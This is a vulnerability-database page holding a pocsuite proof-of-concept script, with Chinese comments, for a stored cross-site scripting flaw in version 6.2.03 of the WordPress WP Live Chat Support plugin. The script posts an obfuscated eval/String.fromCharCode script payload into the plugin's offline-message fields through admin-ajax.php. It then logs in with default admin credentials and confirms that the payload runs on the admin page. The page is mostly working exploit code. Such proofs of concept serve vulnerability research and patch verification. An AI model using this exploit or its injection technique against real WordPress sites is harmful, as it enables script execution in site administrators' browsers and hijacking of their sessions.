Vulners
Lucene search
WordPress WP Live Chat Support(6.2.03) plugin stored XSS
#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from pocsuite.api.utils import randomStr
import urllib
import re
class TestPOC(POCBase):
name = 'WordPress WP Live Chat Support(6.2.03) 插件存储型 XSS'
vulID = '00000' # ssvid-undefine
author = ['soho']
vulType = 'Cross Site Scripting'
version = '1.0' # default version: 1.0
references = ['https://www.exploit-db.com/exploits/40190/']
desc = '''
后台代码未对用户输入进行有效的过滤和净化,导致漏洞存在。利用该漏洞需要一个精心构造
的 POST 请求,被攻击者登录 WordPress 后台查看离线消息时触发恶意代码。
'''
vulDate = '2016-08-01'
createDate = '2016-08-02'
updateDate = '2016-08-02'
appName = 'WordPress WP Live Chat Support'
appVersion = '6.2.03'
appPowerLink = 'https://wordpress.org/plugins/wp-live-chat-support/'
samples = ['http://pan.baidu.com/s/1kVDBg9L']
def _attack(self):
'''attack mode'''
return self._verify()
def _verify(self):
'''verify mode'''
result = {}
# 通过 post 请求注入 XSS 攻击向量
post_path = '/wp-admin/admin-ajax.php'
url_post = '{0}{1}'.format(self.url, post_path)
token = randomStr()
token = str(tuple(map(ord, token)))[1:-1]
payload = '<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, '\
'{0}, 34, 41, 59));</script>'.format(token)
post_data = {
'name': 'NameXSS{0}'.format(payload),
'msg': 'MsgXSS{0}'.format(payload),
'action': 'wplc_user_send_offline_message',
'security': '6d0836b67f',
'email': '[email protected]'
}
r = req.post(url_post, data=post_data)
# 验证 XSS 攻击, authdata 中 log、pwd 为 wordpress 管理员帐户和密码
url_wp_login = '{0}/wp-login.php'.format(self.url)
s = req.Session()
s.get(url_wp_login)
authdata = {'pwd': 'admin', 'log': 'admin'}
s.post(url_wp_login, data=authdata)
verify_path = '/wp-admin/admin.php?page=wplivechat-menu-offline-messages'
url_verify = '{0}{1}'.format(self.url, verify_path)
r = s.get(url_verify)
if not token in r.content:
raise Exception('Error: XSS failed!')
# 验证通过
result = {'VerifyInfo': {}, 'XSSInfo': {}}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Postdata'] = urllib.urlencode(post_data)
result['XSSInfo']['URL'] = self.url
result['XSSInfo']['Payload'] = payload
result['XSSInfo']['InjectionPath'] = post_path
result['XSSInfo']['VerifyPath'] = verify_path
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Aug 2016 00:00Current
7.1High risk
Vulners AI Score7.1